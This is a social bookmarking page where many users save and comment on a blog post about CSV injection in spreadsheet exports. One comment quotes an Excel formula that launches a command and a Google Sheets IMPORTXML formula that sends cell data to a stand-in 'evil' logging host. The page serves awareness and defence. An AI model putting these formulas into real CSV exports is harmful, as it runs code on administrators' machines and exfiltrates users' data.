The Absurdly Underestimated Dangers of CSV Injection

134 bookmarks. First posted by fileformat october 2017.

I’ve been doing the local usergroup circuit with this lately and have been asked to write it up.

In some ways this is old news, but in other ways…well, I think few realize how absolutely devastating and omnipresent this vulnerability can be. It is an attack vector available in every application I’ve ever seen that takes user input and allows administrators to bulk export to CSV.

That is just about every application.

Edit: Credit where due, I’ve been pointed to this article from 2014 by an actual security pro which discusses some of these vectors. And another one.

So let’s set the scene - imagine a time or ticket tracking app. Users enter their time (or tickets) but cannot view those of other users. A site administrator then comes along and exports entries to a csv file, opening it up in a spreadsheet application. Pretty standard stuff.
security  excel  spreadsheets  netsec 
9 weeks ago by danwin
The Absurdly Underestimated Dangers of CSV Injection
from twitter_favs
january 2018 by kinlane
The Absurdly Underestimated Dangers of CSV Injection
from twitter_favs
january 2018 by dnene
Excel interprets `|` in formulas to execute commands!

"=2+5+cmd|' /C calc'!A0"

There's a warning, but CSVs are widely believed to be "just data", so even tech-savvy admins ignore it.

Google Sheets has formulas that can fetch remote data, e.g. IMPORTXML. A query string appended to that can exfiltrate any data not just from that sheet, but from OTHER SHEETS whose IDs are known.

"=IMPORTXML(CONCAT(""http://some-server-with-log.evil?v="", CONCATENATE(A2:E2)), ""//a"")"
cool  CSV  security  data  exfiltration  exploit 
january 2018 by dandv
It's somewhat comforting to note this doesn't affect things like R or Python/Pandas.

https://t.co/i0EjLEyFth
via:packrati.us 
november 2017 by cdgrau
wow! didn't know this about csv - can execute formula, make external requests, etc.
injection  security  standards  vulnerability  hacking  design 
november 2017 by teffalump
RT : The Absurdly Underestimated Dangers of CSV Injection
from twitter
october 2017 by daisyk
CSV injection
csv  security  Excel 
october 2017 by lost_in_space
RT : the absurdly underestimated dangers of CSV injection (and how to mitigate them):
programming  security  webdev  from twitter
october 2017 by sarcas
The Absurdly Underestimated Dangers of CSV Injection I’ve been doing the local usergroup circuit with this lately and have been asked to write it up. In some ways this is old news, but in other ways…well, I think…
IFTTT  Instapaper 
october 2017 by ldodds
I’ve been doing the local usergroup circuit with this lately and have been asked to write it up. In some ways this is old news, but in other ways…well, I think few realize how absolutely devastating and omnipresent this vulnerability can be. via Pocket
Pocket 
october 2017 by driptray
RT : The Absurdly Underestimated Dangers of CSV Injection
from twitter
october 2017 by brandizzi
The Absurdly Underestimated Dangers of CSV Injection
security  attackvector  csv  dataInjectionAttack  vector  attack 
october 2017 by psychemedia
In fact - in Excel at least - any of the symbols = , - , + , or @ will trigger this behavior causing lots of fun times for administrators whose data just doesn’t seem to format correctly (this is actually what brought my attention first to the issue). And just like that, the attacker has free rein to download a keylogger, install things, and overall remotely execute code not merely on any other person’s computer, but on that of someone guaranteed to have access to all users’ data; for example a manager or a company administrator. The attacker starts the cell with their trusty = symbol prefix and then points IMPORTXML to a server they control, appending as a querystring of spreadsheet data. That information isn’t usually considered secret; it appears in the spreadsheet URLs, and will often be accidentally emailed, or posted in intra-company documentation, relying on Google’s security to ensure only authorized users access that data. That way, if a researcher working on a secret warrant is to view their communication in a spreadsheet, a beacon goes out and the criminal has a canary effectively tipping them off that someone is snooping.
october 2017 by sechilds
The Absurdly Underestimated Dangers of CSV Injection
from twitter
october 2017 by rnm
Any cell that starts with an = is treated as a formula.
You can then execute any formula function.
security  excel  google  csv  injection 
october 2017 by drmeme
This isn't frightening at all because CSV exports from XLS don't run the world or anything.
from twitter_favs
october 2017 by nowthis
In some ways this is old news, but in other ways…well, I think few realize how absolutely devastating and omnipresent this vulnerability can be. It is an attack vector available in every application I’ve ever seen that takes user input and allows administrators to bulk export to CSV.
csv  excel  google  security 
october 2017 by ssorc
info leak and code exec
csv  injection  google  excel  command 
october 2017 by plaxx
I’ve been doing the local usergroup circuit with this lately and have been asked to write it up. In some ways this is old news, but in other ways…well, I think few realize how absolutely devastating and omnipresent this vulnerability can be. It is an attack vector available in every application I’ve ever seen that takes user input and allows administrators to bulk export to CSV.
excel  security  google 
october 2017 by danesparza
You can include an arbitrary formula, VBA script, or even shell command in a CSV file and MS Excel will execute it at load time with the current user's privileges. Oy.

You can't do this with Google Sheets, but you *can* send all the data in the spreadsheet, and any others that user can reach, to some x-random URI. This is not much nicer.
security  excel  csv  shellinjection 
october 2017 by yorksranter
The Absurdly Underestimated Dangers of CSV Injection
from twitter_favs
october 2017 by reinhard_codes
CSV can be really dangerous.
CSV  attack  hacking 
october 2017 by traggett
I thought by now I'd be too jaded to find anything about spreadsheets shocking, but then I read this.
from twitter_favs
october 2017 by cpsievert
Dang.
s 
october 2017 by jgordon
You can launch the calculator and everything else with a CSV file? Oh. Ouch.
from twitter
october 2017 by svensonsan
Interesting explanation of “an attack vector available in every application I’ve ever seen that takes user input and allows administrators to bulk export to CSV.”
security 
october 2017 by shiflett
RT : Well this seems interesting in a bad way
h/t to and his 4 short links
from twitter_favs
october 2017 by gnat
I’ve been doing the local usergroup circuit with this lately and have been asked to write it up. In some ways this is old news ( Edit: Credit where due, I’ve…
from instapaper
october 2017 by nielsk